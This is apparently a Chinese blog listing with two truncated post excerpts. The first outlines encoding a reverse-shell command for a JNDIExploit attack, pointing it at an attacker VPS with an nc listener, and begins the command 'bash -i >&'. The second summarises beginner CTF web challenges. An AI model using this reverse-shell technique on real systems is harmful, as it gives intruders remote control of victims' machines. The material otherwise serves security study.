摘要：声明： 该文章来自本人日常学习笔记，请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与本人无关 JNDIExploit 先将反弹shell的命令base64编码，然后将里面的+号和=号进行一次url编码 注：IP填vps公网ip，PORT要和nc监听的端口对应 bash -i >& / 阅读全文

摘要：web1 题目：开发注释未及时删除 查看页面源代码即可 web2 题目：js把鼠标右键和f12屏蔽了 方法一： 禁用JavaScript 方法二： url前面加上view-source: web3 题目：抓个包试试 抓包在请求包发现flag web4 题目：总有人把后台地址写入robots 访问ro 阅读全文